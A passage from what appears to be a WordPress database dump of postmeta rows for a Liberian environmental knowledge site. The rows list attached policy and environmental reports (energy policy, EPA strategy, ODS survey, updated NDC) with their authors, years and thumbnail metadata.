:5:\"width\";i:551;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:15:\"CDC-551x640.png\";s:5:\"width\";i:551;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31239,4379,'_wp_attached_file','2021/09/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf'),(31240,4377,'_wp_page_template','default'),(31241,4377,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf'),(31242,4377,'by','MFDP'),(31243,4377,'year','2018'),(31244,4377,'_pods_document_cover_image','a:1:{i:0;i:4378;}'),(31245,4377,'document_cover_image','4378'),(31246,4377,'_pods_attached_document','a:1:{i:0;i:4379;}'),(31247,4377,'attached_document','4379'),(31248,4382,'_last_editor_used_jetpack','classic-editor'),(31249,4382,'_edit_lock','1632408065:38'),(31250,4382,'_edit_last','38'),(31251,4383,'_wp_attached_file','2021/09/MME.png'),(31252,4383,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:513;s:6:\"height\";i:663;s:4:\"file\";s:15:\"2021/09/MME.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"MME-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"MME-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"MME-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"MME-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"MME-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"MME-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"MME-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"MME-513x450.png\";s:5:\"width\";i:513;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:15:\"MME-513x650.png\";s:5:\"width\";i:513;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"MME-513x640.png\";s:5:\"width\";i:513;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:15:\"MME-513x640.png\";s:5:\"width\";i:513;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31253,4384,'_wp_attached_file','2021/09/National-Energy-Policy-2009.pdf'),(31254,4382,'_wp_page_template','default'),(31255,4382,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/National-Energy-Policy-2009.pdf'),(31256,4382,'by','MME'),(31257,4382,'year','2009'),(31258,4382,'_pods_document_cover_image','a:1:{i:0;i:4383;}'),(31259,4382,'document_cover_image','4383'),(31260,4382,'_pods_attached_document','a:1:{i:0;i:4384;}'),(31261,4382,'attached_document','4384'),(31262,4387,'_last_editor_used_jetpack','classic-editor'),(31263,4387,'_edit_lock','1632408949:38'),(31264,4387,'_edit_last','38'),(31265,4388,'_wp_attached_file','2021/09/WJF.png'),(31266,4388,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:519;s:6:\"height\";i:665;s:4:\"file\";s:15:\"2021/09/WJF.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"WJF-234x300.png\";s:5:\"width\";i:234;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"WJF-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"WJF-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"WJF-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"WJF-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"WJF-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"WJF-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"WJF-519x450.png\";s:5:\"width\";i:519;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:15:\"WJF-519x650.png\";s:5:\"width\";i:519;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"WJF-519x640.png\";s:5:\"width\";i:519;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:15:\"WJF-519x640.png\";s:5:\"width\";i:519;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31267,4389,'_wp_attached_file','2021/09/2014_gvl_report_.pdf'),(31268,4387,'_wp_page_template','default'),(31269,4387,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/2014_gvl_report_.pdf'),(31270,4387,'by','Wild Chimpanzee Foundation (WCF) Dervla Dowd, Virginie Vergnes, Emmanuelle Normand, Clement Tweh, Christophe Boesch'),(31271,4387,'year','2014'),(31272,4387,'_pods_document_cover_image','a:1:{i:0;i:4388;}'),(31273,4387,'document_cover_image','4388'),(31274,4387,'_pods_attached_document','a:1:{i:0;i:4389;}'),(31275,4387,'attached_document','4389'),(31276,4391,'_last_editor_used_jetpack','classic-editor'),(31277,4391,'_edit_lock','1632410692:38'),(31278,4391,'_edit_last','38'),(31279,4392,'_wp_attached_file','2021/09/Liberia-Environmental-Profile.png'),(31280,4392,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:518;s:6:\"height\";i:667;s:4:\"file\";s:41:\"2021/09/Liberia-Environmental-Profile.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-233x300.png\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:40:\"Liberia-Environmental-Profile-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-518x450.png\";s:5:\"width\";i:518;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-518x650.png\";s:5:\"width\";i:518;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-518x640.png\";s:5:\"width\";i:518;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:41:\"Liberia-Environmental-Profile-518x640.png\";s:5:\"width\";i:518;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31281,4393,'_wp_attached_file','2021/09/cep_liberia_2006_.pdf'),(31282,4391,'_wp_page_template','default'),(31283,4391,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/cep_liberia_2006_.pdf'),(31284,4391,'by','Dr Giorgio V. Brandolini, agronomist, biodiversity expert, Dr Mohammed Tigani, environmental policy and management expert (industry, water, and waste  management)'),(31285,4391,'year','2006'),(31286,4391,'_pods_document_cover_image','a:1:{i:0;i:4392;}'),(31287,4391,'document_cover_image','4392'),(31288,4391,'_pods_attached_document','a:1:{i:0;i:4393;}'),(31289,4391,'attached_document','4393'),(31290,4395,'_last_editor_used_jetpack','classic-editor'),(31291,4395,'_edit_lock','1632412251:38'),(31292,4395,'_edit_last','38'),(31293,4396,'_last_editor_used_jetpack','classic-editor'),(31294,4396,'_edit_lock','1632413566:38'),(31295,4396,'_edit_last','38'),(31296,4397,'_wp_attached_file','2021/09/EPA-1.png'),(31297,4397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:603;s:6:\"height\";i:847;s:4:\"file\";s:17:\"2021/09/EPA-1.png\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"EPA-1-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"EPA-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"EPA-1-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"EPA-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"EPA-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"EPA-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"EPA-1-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"EPA-1-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:17:\"EPA-1-603x650.png\";s:5:\"width\";i:603;s:6:\"height\";i:650;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"EPA-1-600x843.png\";s:5:\"width\";i:600;s:6:\"height\";i:843;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"EPA-1-603x640.png\";s:5:\"width\";i:603;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:17:\"EPA-1-603x640.png\";s:5:\"width\";i:603;s:6:\"height\";i:640;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31298,4398,'_wp_attached_file','2021/09/EPA-STRATEGY-PLAN-IMMPLEMMATION-FINAL-WORKs.pdf'),(31299,4396,'_wp_page_template','default'),(31300,4396,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/EPA-STRATEGY-PLAN-IMMPLEMMATION-FINAL-WORKs.pdf'),(31301,4396,'by','EPA'),(31302,4396,'year','2012'),(31303,4396,'_pods_document_cover_image','a:1:{i:0;i:4397;}'),(31304,4396,'document_cover_image','4397'),(31305,4396,'_pods_attached_document','a:1:{i:0;i:4398;}'),(31306,4396,'attached_document','4398'),(31307,4400,'_edit_lock','1632846124:38'),(31308,4400,'_last_editor_used_jetpack','block-editor'),(31309,4401,'_wp_attached_file','2021/09/State-of-Environment1.jpg'),(31310,4401,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:719;s:4:\"file\";s:33:\"2021/09/State-of-Environment1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-768x575.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:575;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:32:\"State-of-Environment1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-960x650.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-600x449.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:33:\"State-of-Environment1-960x640.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31313,4400,'_thumbnail_id','4401'),(31314,4400,'_edit_last','38'),(31315,4400,'kava_extra_enable_breadcrumbs','inherit'),(31316,4400,'post_formats',''),(31317,4400,'gallery_tab',''),(31318,4400,'kava_extra_gallery_images',''),(31319,4400,'link_tab',''),(31320,4400,'kava_extra_link',''),(31321,4400,'kava_extra_link_target','_blank'),(31322,4400,'quote_tab',''),(31323,4400,'kava_extra_quote_text',''),(31324,4400,'kava_extra_quote_cite',''),(31325,4400,'audio_tab',''),(31326,4400,'kava_extra_audio',''),(31327,4400,'kava_extra_audio_loop','false'),(31328,4400,'kava_extra_audio_autoplay','false'),(31329,4400,'kava_extra_audio_preload','false'),(31330,4400,'video_tab',''),(31331,4400,'kava_extra_video_type','library'),(31332,4400,'kava_extra_video_library',''),(31333,4400,'kava_extra_video_external',''),(31334,4400,'kava_extra_video_poster',''),(31335,4400,'kava_extra_video_width','770'),(31336,4400,'kava_extra_video_height','480'),(31337,4400,'kava_extra_video_loop','false'),(31338,4400,'kava_extra_video_autoplay','false'),(31339,4400,'kava_extra_video_preload','false'),(31341,4404,'_last_editor_used_jetpack','classic-editor'),(31342,4404,'_edit_lock','1632851178:42'),(31343,4404,'_edit_last','42'),(31344,4405,'_wp_attached_file','2021/09/ods-survey.png'),(31345,4405,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:22:\"2021/09/ods-survey.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"ods-survey-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"ods-survey-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"ods-survey-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"ods-survey-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:22:\"ods-survey-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:22:\"ods-survey-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31346,4406,'_wp_attached_file','2021/09/LIBERIAS-ODS-ALTERNATIVES-SURVEY-REPORT.pdf'),(31347,4404,'_wp_page_template','default'),(31348,4404,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/LIBERIAS-ODS-ALTERNATIVES-SURVEY-REPORT.pdf'),(31349,4404,'by','EPA'),(31350,4404,'year','2016'),(31351,4404,'_pods_document_cover_image','a:1:{i:0;i:4405;}'),(31352,4404,'document_cover_image','4405'),(31353,4404,'_pods_attached_document','a:1:{i:0;i:4406;}'),(31354,4404,'attached_document','4406'),(31355,4408,'_last_editor_used_jetpack','classic-editor'),(31356,4408,'_edit_lock','1632857889:42'),(31357,4408,'_edit_last','42'),(31358,4409,'_wp_attached_file','2021/09/NOU.png'),(31359,4409,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:15:\"2021/09/NOU.png\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"NOU-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"NOU-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"NOU-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"NOU-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"NOU-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"NOU-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31360,4410,'_wp_attached_file','2021/09/Hydrochlorofluoprocarbon-Verification-Report-for-Liberia.pdf'),(31361,4408,'_wp_page_template','default'),(31362,4408,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Hydrochlorofluoprocarbon-Verification-Report-for-Liberia.pdf'),(31363,4408,'by','Samuel T. Maximore'),(31364,4408,'year','2016'),(31365,4408,'_pods_document_cover_image','a:1:{i:0;i:4409;}'),(31366,4408,'document_cover_image','4409'),(31367,4408,'_pods_attached_document','a:1:{i:0;i:4410;}'),(31368,4408,'attached_document','4410'),(31369,4412,'_last_editor_used_jetpack','classic-editor'),(31370,4412,'_edit_lock','1632858541:42'),(31371,4412,'_edit_last','42'),(31372,4413,'_wp_attached_file','2021/09/ndc-1.png'),(31373,4413,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:17:\"2021/09/ndc-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"ndc-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"ndc-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"ndc-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"ndc-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"ndc-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"ndc-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"ndc-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31374,4414,'_wp_attached_file','2021/09/Liberias-Updated-NDC_RL_FINAL-002.pdf'),(31375,4412,'_wp_page_template','default'),(31376,4412,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Liberias-Updated-NDC_RL_FINAL-002.pdf'),(31377,4412,'by','EPA'),(31378,4412,'year','2021'),(31379,4412,'_pods_document_cover_image','a:1:{i:0;i:4413;}'),(31380,4412,'document_cover_image','4413'),(31381,4412,'_pods_attached_document','a:1:{i:0;i:4414;}'),(31382,4412,'attached_document','4414'),(31383,4416,'_last_editor_used_jetpack','classic-editor'),(31384,4416,'_edit_lock','1632859078:42'),(31385,4416,'_edit_last','42'),(31386,4417,'_wp_attached_file','2021/09/lisgis.png'),(31387,4417,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:18:\"2021/09/lisgis.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"lisgis-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"lisgis-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\